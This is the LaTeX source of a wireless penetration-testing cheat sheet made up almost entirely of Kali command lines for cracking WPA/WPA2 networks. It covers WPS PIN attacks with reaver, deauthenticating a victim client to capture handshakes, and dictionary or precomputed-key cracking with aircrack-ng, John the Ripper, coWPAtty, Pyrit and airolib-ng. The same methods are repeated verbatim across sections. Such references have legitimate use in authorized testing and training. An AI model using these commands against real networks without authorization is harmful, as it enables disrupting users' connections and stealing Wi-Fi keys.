\mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 2 (+ 2) root@kali:\textasciitilde{}\# cd /pentest/passwords/john \newline % Row Count 3 (+ 1) root@kali:\textasciitilde{}\# ./john –wordlist=\textless{}Wordlist\textgreater{} -{}-rules –stdout|aircrack-ng -0 –e \textless{}ESSID\textgreater{} -w - \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 6 (+ 3) \#or \newline % Row Count 7 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng \textless{}FileName\textgreater{}.cap -J \textless{}outFile\textgreater{} \newline % Row Count 9 (+ 2) root@kali:\textasciitilde{}\# hccap2john \textless{}outFile\textgreater{}.hccap \textgreater{} \textless{}JohnOutFile\textgreater{} \newline % Row Count 11 (+ 2) root@kali:\textasciitilde{}\# john \textless{}JohnOutFile\textgreater{} \newline % Row Count 12 (+ 1) Method 4: Crack with coWPAtty \newline % Row Count 13 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 14 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 16 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 18 (+ 2) root@kali:\textasciitilde{}\# cowpatty –r \textless{}FileName\textgreater{} -f \textless{}Wordlist\textgreater{} -2 –s \textless{}SSID\textgreater{} \newline % Row Count 20 (+ 2) root@kali:\textasciitilde{}\# genpmk –s \textless{}SSID\textgreater{} –f \textless{}Wordlist\textgreater{} -d \textless{}HashesFileName\textgreater{} \newline % Row Count 22 (+ 2) root@kali:\textasciitilde{}\# cowpatty –r \textless{}PCAP\_of\_FileName\textgreater{} -d \textless{}HashesFileName\textgreater{} -2 –s \textless{}SSID\textgreater{} \newline % Row Count 24 (+ 2) Method 5: Crack with Pyrit \newline % Row Count 25 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 26 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 28 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# pyrit –r\textless{}PCAP\_of\_FileName\textgreater{} -b \textless{}BSSID\textgreater{} -i \textless{}Wordlist\textgreater{} attack\_passthrough \newline % Row Count 2 (+ 2) root@kali:\textasciitilde{}\# pyrit –i \textless{}Wordlist\textgreater{} import\_passwords \newline % Row Count 4 (+ 2) root@kali:\textasciitilde{}\# pyrit –e \textless{}ESSID\textgreater{} create\_essid \newline % Row Count 5 (+ 1) root@kali:\textasciitilde{}\# pyrit batch \newline % Row Count 6 (+ 1) root@kali:\textasciitilde{}\# pyrit –r \textless{}PCAP\_of\_FileName\textgreater{} attack\_db \newline % Row Count 8 (+ 2) Method 6: Precomputed WPA Keys Database Attack \newline % Row Count 9 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 10 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 12 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 14 (+ 2) root@kali:\textasciitilde{}\# kwrite ESSID.txt \newline % Row Count 15 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-import essid ESSID.txt \newline % Row Count 17 (+ 2) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-import passwd \textless{}DictionaryFile\textgreater{} \newline % Row Count 19 (+ 2) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-clean all \newline % Row Count 20 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-stats \newline % Row Count 21 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-batch \newline % Row Count 22 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-verify all \newline % Row Count 23 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng –r NEW\_DB \textless{}Handshaked\_PCAP\textgreater{} % Row Count 25 (+ 2) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{WPA/ WPA2 Cracking}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Method 1: WPS Attack \newline % Row Count 1 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 2 (+ 1) root@kali:\textasciitilde{}\# apt-get install reaver \newline % Row Count 3 (+ 1) root@kali:\textasciitilde{}\# wash –i mon0 \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# reaver –i mon0 –b \textless{}BSSID\textgreater{} -vv –S \newline % Row Count 6 (+ 2) \#or, Specific attack \newline % Row Count 7 (+ 1) root@kali:\textasciitilde{}\# reaver –i mon0 –c \textless{}Channel\textgreater{} -b \textless{}BSSID\textgreater{} -p \textless{}PinCode\textgreater{} -vv –S \newline % Row Count 9 (+ 2) Method 2: Dictionary Attack \newline % Row Count 10 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 11 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 13 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 15 (+ 2) root@kali:\textasciitilde{}\# aircrack-ng –w \textless{}WordlistFile\textgreater{} -b \textless{}BSSID\textgreater{} \textless{}Handshaked\_PCAP\textgreater{} \newline % Row Count 17 (+ 2) Method 3: Crack with John The Ripper \newline % Row Count 18 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 19 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 21 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 23 (+ 2) root@kali:\textasciitilde{}\# cd /pentest/passwords/john \newline % Row Count 25 (+ 2) root@kali:\textasciitilde{}\# ./john –wordlist=\textless{}Wordlist\textgreater{} -{}-rules –stdout|aircrack-ng -0 –e \textless{}ESSID\textgreater{} -w - \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 28 (+ 3) \#or \newline % Row Count 29 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng \textless{}FileName\textgreater{}.cap -J \textless{}outFile\textgreater{} \newline % Row Count 31 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{WPA/ WPA2 Cracking (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# hccap2john \textless{}outFile\textgreater{}.hccap \textgreater{} \textless{}JohnOutFile\textgreater{} \newline % Row Count 2 (+ 2) root@kali:\textasciitilde{}\# john \textless{}JohnOutFile\textgreater{} \newline % Row Count 3 (+ 1) Method 4: Crack with coWPAtty \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 5 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 7 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 9 (+ 2) root@kali:\textasciitilde{}\# cowpatty –r \textless{}FileName\textgreater{} -f \textless{}Wordlist\textgreater{} -2 –s \textless{}SSID\textgreater{} \newline % Row Count 11 (+ 2) root@kali:\textasciitilde{}\# genpmk –s \textless{}SSID\textgreater{} –f \textless{}Wordlist\textgreater{} -d \textless{}HashesFileName\textgreater{} \newline % Row Count 13 (+ 2) root@kali:\textasciitilde{}\# cowpatty –r \textless{}PCAP\_of\_FileName\textgreater{} -d \textless{}HashesFileName\textgreater{} -2 –s \textless{}SSID\textgreater{} \newline % Row Count 16 (+ 3) Method 5: Crack with Pyrit \newline % Row Count 17 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 18 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 20 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 22 (+ 2) root@kali:\textasciitilde{}\# pyrit –r\textless{}PCAP\_of\_FileName\textgreater{} -b \textless{}BSSID\textgreater{} -i \textless{}Wordlist\textgreater{} attack\_passthrough \newline % Row Count 25 (+ 3) root@kali:\textasciitilde{}\# pyrit –i \textless{}Wordlist\textgreater{} import\_passwords \newline % Row Count 27 (+ 2) root@kali:\textasciitilde{}\# pyrit –e \textless{}ESSID\textgreater{} create\_essid \newline % Row Count 29 (+ 2) root@kali:\textasciitilde{}\# pyrit batch \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{WPA/ WPA2 Cracking (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# pyrit –r \textless{}PCAP\_of\_FileName\textgreater{} attack\_db \newline % Row Count 2 (+ 2) Method 6: Precomputed WPA Keys Database Attack \newline % Row Count 3 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 6 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 8 (+ 2) root@kali:\textasciitilde{}\# kwrite ESSID.txt \newline % Row Count 9 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-import essid ESSID.txt \newline % Row Count 11 (+ 2) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-import passwd \textless{}DictionaryFile\textgreater{} \newline % Row Count 13 (+ 2) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-clean all \newline % Row Count 14 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-stats \newline % Row Count 15 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-batch \newline % Row Count 16 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-verify all \newline % Row Count 17 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng –r NEW\_DB \textless{}Handshaked\_PCAP\textgreater{} % Row Count 19 (+ 2) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}